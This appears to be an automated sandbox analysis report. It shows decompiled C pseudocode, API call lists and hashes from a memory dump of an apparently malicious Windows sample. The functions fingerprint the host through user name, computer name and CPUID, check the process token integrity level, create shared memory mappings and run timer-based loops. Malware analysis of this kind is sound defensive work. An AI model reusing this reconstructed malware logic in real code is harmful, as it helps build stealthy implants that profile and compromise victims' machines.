                                                                                                                                  • wsprintfA.USER32 ref: 031A45C1
                                                                                                                                  • wsprintfA.USER32 ref: 031A45E1
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031A45FE
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A460E
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A4622
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A4640
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,031A4653,?,05BD95B0), ref: 031A199F
                                                                                                                                    • Part of subcall function 031A1974: lstrlen.KERNEL32(?,?,?,031A4653,?,05BD95B0), ref: 031A19A7
                                                                                                                                    • Part of subcall function 031A1974: strcpy.NTDLL ref: 031A19BE
                                                                                                                                    • Part of subcall function 031A1974: lstrcat.KERNEL32(00000000,?), ref: 031A19C9
                                                                                                                                    • Part of subcall function 031A1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031A4653,?,05BD95B0), ref: 031A19E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,031AC2AC,?,05BD95B0), ref: 031A4672
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(05BD9B10,00000000,00000000,7691C740,031A467E,00000000), ref: 031A38DA
                                                                                                                                    • Part of subcall function 031A38CA: lstrlen.KERNEL32(?), ref: 031A38E2
                                                                                                                                    • Part of subcall function 031A38CA: lstrcpy.KERNEL32(00000000,05BD9B10), ref: 031A38F6
                                                                                                                                    • Part of subcall function 031A38CA: lstrcat.KERNEL32(00000000,?), ref: 031A3901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 031A4691
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 031A4698
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 031A46A5
                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 031A46A9
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 031A46D9
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 031A46E8
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,05BD95B0), ref: 031A46F7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A4709
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 031A4718
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3963266935-8415677
                                                                                                                                  • Opcode ID: 289b54f7180b0d78b888cd3e0702f2885f8c9d270d12e6bc8fcaee1a128fef10
                                                                                                                                  • Instruction ID: 617c99960048bf660ec0bab4df219d2c7173c3ad69d1f45f3b217e305434f680
                                                                                                                                  • Opcode Fuzzy Hash: 289b54f7180b0d78b888cd3e0702f2885f8c9d270d12e6bc8fcaee1a128fef10
                                                                                                                                  • Instruction Fuzzy Hash: CC61ABB9500E00AFC729EB68ED48E567BA8FB4C352F050515F908C7654DB34E886DBB5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E031A5461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				struct %anon52 _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				union _LARGE_INTEGER _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				void* _v44;
                                                                                                                                  				void _v88;
                                                                                                                                  				char _v92;
                                                                                                                                  				struct %anon52 _t46;
                                                                                                                                  				intOrPtr _t51;
                                                                                                                                  				long _t53;
                                                                                                                                  				void* _t54;
                                                                                                                                  				struct %anon52 _t60;
                                                                                                                                  				long _t64;
                                                                                                                                  				signed int _t65;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t70;
                                                                                                                                  				signed int _t71;
                                                                                                                                  				intOrPtr _t73;
                                                                                                                                  				intOrPtr _t76;
                                                                                                                                  				void** _t78;
                                                                                                                                  				void* _t80;
                                                                                                                                  
                                                                                                                                  				_t73 = __edx;
                                                                                                                                  				_v92 = 0;
                                                                                                                                  				memset( &_v88, 0, 0x2c);
                                                                                                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                  				_v44 = _t46;
                                                                                                                                  				if(_t46 == 0) {
                                                                                                                                  					_v8.LowPart = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					_push(0xffffffff);
                                                                                                                                  					_push(0xff676980);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push( *0x31ad278);
                                                                                                                                  					_v20 = 0;
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					L031AAED0();
                                                                                                                                  					_v36.LowPart = _t46;
                                                                                                                                  					_v32 = _t73;
                                                                                                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                  					_t51 =  *0x31ad2a4; // 0x2e0
                                                                                                                                  					_v40 = _t51;
                                                                                                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                  					_v8.LowPart = _t53;
                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                  							L4:
                                                                                                                                  							 *0x31ad284 = 5;
                                                                                                                                  						} else {
                                                                                                                                  							_t68 = E031A502E(_t73); // executed
                                                                                                                                  							if(_t68 != 0) {
                                                                                                                                  								goto L4;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_v12 = 0;
                                                                                                                                  						L6:
                                                                                                                                  						if(_v12 == 1 && ( *0x31ad298 & 0x00000001) == 0) {
                                                                                                                                  							_v12 = 2;
                                                                                                                                  						}
                                                                                                                                  						_t71 = _v12;
                                                                                                                                  						_t58 = _t71 << 4;
                                                                                                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                  						_t72 = _t71 + 1;
                                                                                                                                  						_v24 = _t71 + 1;
                                                                                                                                  						_t60 = E031A577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                                                  						_v8.LowPart = _t60;
                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                  							goto L17;
                                                                                                                                  						}
                                                                                                                                  						_t65 = _v24;
                                                                                                                                  						_v12 = _t65;
                                                                                                                                  						_t90 = _t65 - 3;
                                                                                                                                  						if(_t65 != 3) {
                                                                                                                                  							goto L6;
                                                                                                                                  						} else {
                                                                                                                                  							_v8.LowPart = E031A2107(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                  						}
                                                                                                                                  						goto L12;
                                                                                                                                  						L17:
                                                                                                                                  						__eflags = _t60 - 0x10d2;
                                                                                                                                  						if(_t60 != 0x10d2) {
                                                                                                                                  							_push(0xffffffff);
                                                                                                                                  							_push(0xff676980);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( *0x31ad27c);
                                                                                                                                  							goto L21;
                                                                                                                                  						} else {
                                                                                                                                  							__eflags =  *0x31ad280; // 0x0
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L12;
                                                                                                                                  							} else {
                                                                                                                                  								_t60 = E031A47D5();
                                                                                                                                  								_push(0xffffffff);
                                                                                                                                  								_push(0xdc3cba00);
                                                                                                                                  								_push(0);
                                                                                                                                  								_push( *0x31ad280);
                                                                                                                                  								L21:
                                                                                                                                  								L031AAED0();
                                                                                                                                  								_v36.LowPart = _t60;
                                                                                                                                  								_v32 = _t76;
                                                                                                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                  								_v8.LowPart = _t64;
                                                                                                                                  								__eflags = _t64;
                                                                                                                                  								if(_t64 == 0) {
                                                                                                                                  									goto L6;
                                                                                                                                  								} else {
                                                                                                                                  									goto L12;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L25:
                                                                                                                                  					}
                                                                                                                                  					L12:
                                                                                                                                  					_t78 =  &_v92;
                                                                                                                                  					_t70 = 3;
                                                                                                                                  					do {
                                                                                                                                  						_t54 =  *_t78;
                                                                                                                                  						if(_t54 != 0) {
                                                                                                                                  							HeapFree( *0x31ad270, 0, _t54);
                                                                                                                                  						}
                                                                                                                                  						_t78 =  &(_t78[4]);
                                                                                                                                  						_t70 = _t70 - 1;
                                                                                                                                  					} while (_t70 != 0);
                                                                                                                                  					CloseHandle(_v44);
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  				goto L25;
                                                                                                                                  			}

                                                                                                                                  0x031a5572
                                                                                                                                  0x031a5578
                                                                                                                                  0x031a557b
                                                                                                                                  0x031a557b
                                                                                                                                  0x031a5581
                                                                                                                                  0x031a5581
                                                                                                                                  0x031a55fe
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • memset.NTDLL ref: 031A5476
                                                                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 031A5482
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 031A54A7
                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 031A54C3
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 031A54DC
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 031A5572
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 031A5581
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 031A55BB
                                                                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,031A53C9,?), ref: 031A55D1
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 031A55DC
                                                                                                                                    • Part of subcall function 031A502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05BD9370,00000000,?,74E5F710,00000000,74E5F730), ref: 031A507D
                                                                                                                                    • Part of subcall function 031A502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05BD93A8,?,00000000,30314549,00000014,004F0053,05BD9364), ref: 031A511A
                                                                                                                                    • Part of subcall function 031A502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031A54EF), ref: 031A512C
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A55EE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3521023985-969920318
                                                                                                                                  • Opcode ID: daedf046ec9bd70322d992889556cf6f525fbc2365d93645fb9de1eb2574bbb9
                                                                                                                                  • Instruction ID: b0935c69ec34354703cc3a0d389e793d08f91bd0e74210ad3011761965f87550
                                                                                                                                  • Opcode Fuzzy Hash: daedf046ec9bd70322d992889556cf6f525fbc2365d93645fb9de1eb2574bbb9
                                                                                                                                  • Instruction Fuzzy Hash: 22519F79805A28ABCF11EFA9DC449EEBFBAEF0D322F144116F410E6144D7308684DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E031A3598(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				struct _FILETIME* _v12;
                                                                                                                                  				short _v56;
                                                                                                                                  				struct _FILETIME* _t12;
                                                                                                                                  				intOrPtr _t13;
                                                                                                                                  				void* _t17;
                                                                                                                                  				void* _t21;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				long _t28;
                                                                                                                                  				void* _t30;
                                                                                                                                  
                                                                                                                                  				_t27 = __edx;
                                                                                                                                  				_t12 =  &_v12;
                                                                                                                                  				GetSystemTimeAsFileTime(_t12);
                                                                                                                                  				_push(0x192);
                                                                                                                                  				_push(0x54d38000);
                                                                                                                                  				_push(_v8);
                                                                                                                                  				_push(_v12);
                                                                                                                                  				L031AAECA();
                                                                                                                                  				_push(_t12);
                                                                                                                                  				_v12 = _t12;
                                                                                                                                  				_t13 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t5 = _t13 + 0x31ae876; // 0x5bd8e1e
                                                                                                                                  				_t6 = _t13 + 0x31ae59c; // 0x530025
                                                                                                                                  				_push(0x16);
                                                                                                                                  				_push( &_v56);
                                                                                                                                  				_v8 = _t27;
                                                                                                                                  				L031AABEA();
                                                                                                                                  				_t17 = CreateFileMappingW(0xffffffff, 0x31ad2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                  				_t30 = _t17;
                                                                                                                                  				if(_t30 == 0) {
                                                                                                                                  					_t28 = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					if(GetLastError() == 0xb7) {
                                                                                                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                  						if(_t21 == 0) {
                                                                                                                                  							_t28 = GetLastError();
                                                                                                                                  							if(_t28 != 0) {
                                                                                                                                  								goto L6;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							 *_a4 = _t30;
                                                                                                                                  							 *_a8 = _t21;
                                                                                                                                  							_t28 = 0;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t28 = 2;
                                                                                                                                  						L6:
                                                                                                                                  						CloseHandle(_t30);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t28;
                                                                                                                                  			}














                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,031A529C,?,?,4D283A53,?,?), ref: 031A35A4
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 031A35BA
                                                                                                                                  • _snwprintf.NTDLL ref: 031A35DF
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,031AD2E4,00000004,00000000,00001000,?), ref: 031A35FB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,031A529C,?,?,4D283A53), ref: 031A360D
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 031A3624
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,031A529C,?,?), ref: 031A3645
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,031A529C,?,?,4D283A53), ref: 031A364D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1814172918-3251738875
                                                                                                                                  • Opcode ID: f9ce441610530ef6308caf16e46ff3ad06a6f65919d7bb878e6489c976a7fa2f
                                                                                                                                  • Instruction ID: 4032ee3cee525861a9deeff8e1d90c39f4519414923cacc0496ebb6c7d404fbc
                                                                                                                                  • Opcode Fuzzy Hash: f9ce441610530ef6308caf16e46ff3ad06a6f65919d7bb878e6489c976a7fa2f
                                                                                                                                  • Instruction Fuzzy Hash: B521D27EA00A04BBC715EB68DD05F9E77A9AF4C702F250121F61AE72C0DB70D645DBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E031AA82B(char __eax, void* __esi) {
                                                                                                                                  				long _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				long _t34;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				long _t50;
                                                                                                                                  				char _t59;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				void* _t62;
                                                                                                                                  				void* _t64;
                                                                                                                                  				char _t65;
                                                                                                                                  				intOrPtr* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t69 = __esi;
                                                                                                                                  				_t65 = __eax;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = __eax;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t59 =  *0x31ad2a8; // 0xd448b889
                                                                                                                                  					_v12 = _t59;
                                                                                                                                  				}
                                                                                                                                  				_t64 = _t69;
                                                                                                                                  				E031A60B6( &_v12, _t64);
                                                                                                                                  				if(_t65 != 0) {
                                                                                                                                  					 *_t69 =  *_t69 ^  *0x31ad2dc ^ 0x46d76429;
                                                                                                                                  				} else {
                                                                                                                                  					GetUserNameW(0,  &_v8); // executed
                                                                                                                                  					_t50 = _v8;
                                                                                                                                  					if(_t50 != 0) {
                                                                                                                                  						_t62 = RtlAllocateHeap( *0x31ad270, 0, _t50 + _t50);
                                                                                                                                  						if(_t62 != 0) {
                                                                                                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                  								_t64 = _t62;
                                                                                                                                  								 *_t69 =  *_t69 ^ E031A789B(_v8 + _v8, _t64);
                                                                                                                                  							}
                                                                                                                                  							HeapFree( *0x31ad270, 0, _t62);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t61 = __imp__;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				GetComputerNameW(0,  &_v8);
                                                                                                                                  				_t34 = _v8;
                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                  					_t68 = RtlAllocateHeap( *0x31ad270, 0, _t34 + _t34);
                                                                                                                                  					if(_t68 != 0) {
                                                                                                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                  							_t64 = _t68;
                                                                                                                                  							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E031A789B(_v8 + _v8, _t64);
                                                                                                                                  						}
                                                                                                                                  						HeapFree( *0x31ad270, 0, _t68);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				asm("cpuid");
                                                                                                                                  				_t67 =  &_v28;
                                                                                                                                  				 *_t67 = 1;
                                                                                                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                  				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                                  				 *(_t67 + 0xc) = _t64;
                                                                                                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                  				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                                  				return _t39;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 031AA862
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 031AA879
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 031AA886
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,031A538B), ref: 031AA8A7
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031AA8CE
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 031AA8E2
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031AA8EF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,031A538B), ref: 031AA90D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3239747167-8415677
                                                                                                                                  • Opcode ID: e4fdb65b613725ff479bea075df951453a18d760acb5c97c3ba478abaf33c383
                                                                                                                                  • Instruction ID: e67d1f4ab1b73865b085516af6ff70f810bdbd6a2de77c99c46d7121f215dde0
                                                                                                                                  • Opcode Fuzzy Hash: e4fdb65b613725ff479bea075df951453a18d760acb5c97c3ba478abaf33c383
                                                                                                                                  • Instruction Fuzzy Hash: 79310A75A00A05AFDB24EFA9D980A6EB7F9FF4C202F15446AE505D3214DB30EA41DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4151(long* _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				int _t33;
                                                                                                                                  				void* _t46;
                                                                                                                                  
                                                                                                                                  				_v16 = 1;
                                                                                                                                  				_v20 = 0x2000;
                                                                                                                                  				if( *0x31ad294 > 5) {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                  						_v8 = 0;
                                                                                                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                  							_t46 = E031A75F6(_v8);
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                  								if(_t33 != 0) {
                                                                                                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                  								}
                                                                                                                                  								E031A4AAB(_t46);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				 *_a4 = _v20;
                                                                                                                                  				return _v16;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 031A4183
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 031A41A3
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 031A41B3
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 031A4203
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 031A41D6
                                                                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 031A41DE
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 031A41EE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1295030180-0
                                                                                                                                  • Opcode ID: 6deb68084f494a408edfe5ff2ce20fbadaefa9b20aa98af484a7b790d0ec6119
                                                                                                                                  • Instruction ID: b0c59db4ab5e7b15a2be1575b61f7089429b3b28e591f8a464db39965701c805
                                                                                                                                  • Opcode Fuzzy Hash: 6deb68084f494a408edfe5ff2ce20fbadaefa9b20aa98af484a7b790d0ec6119
                                                                                                                                  • Instruction Fuzzy Hash: FB216079900609FFEB00EF95DD44DEEBBB9EF4C305F100066E511A6250CB719A45EB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E031A262F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				void* _t10;
                                                                                                                                  				void* _t12;
                                                                                                                                  				int _t14;
                                                                                                                                  				signed int _t16;
                                                                                                                                  				void* _t18;
                                                                                                                                  				signed int _t19;
                                                                                                                                  				unsigned int _t23;
                                                                                                                                  				void* _t27;
                                                                                                                                  				signed int _t34;
                                                                                                                                  
                                                                                                                                  				_t27 = __edx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                  				 *0x31ad270 = _t10;
                                                                                                                                  				if(_t10 != 0) {
                                                                                                                                  					 *0x31ad160 = GetTickCount();
                                                                                                                                  					_t12 = E031A1A24(_a4);
                                                                                                                                  					if(_t12 == 0) {
                                                                                                                                  						do {
                                                                                                                                  							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                  							_t14 = SwitchToThread();
                                                                                                                                  							_t23 = _v12.dwHighDateTime;
                                                                                                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(0x13);
                                                                                                                                  							_push(_t23 >> 5);
                                                                                                                                  							_push(_t16);
                                                                                                                                  							L031AB02E();
                                                                                                                                  							_t34 = _t14 + _t16;
                                                                                                                                  							_t18 = E031A4F23(_a4, _t34);
                                                                                                                                  							_t19 = 3;
                                                                                                                                  							_t26 = _t34 & 0x00000007;
                                                                                                                                  							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                                  						} while (_t18 == 1);
                                                                                                                                  						if(E031A27C7(_t26) != 0) {
                                                                                                                                  							 *0x31ad298 = 1; // executed
                                                                                                                                  						}
                                                                                                                                  						_t12 = E031A520D(_t27); // executed
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t12 = 8;
                                                                                                                                  				}
                                                                                                                                  				return _t12;
                                                                                                                                  			}














                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A2642
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A2656
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,031A1900,?), ref: 031A2672
                                                                                                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,031A1900,?), ref: 031A2678
                                                                                                                                  • _aullrem.NTDLL(?,?,00000013,00000000), ref: 031A2695
                                                                                                                                  • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A26B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
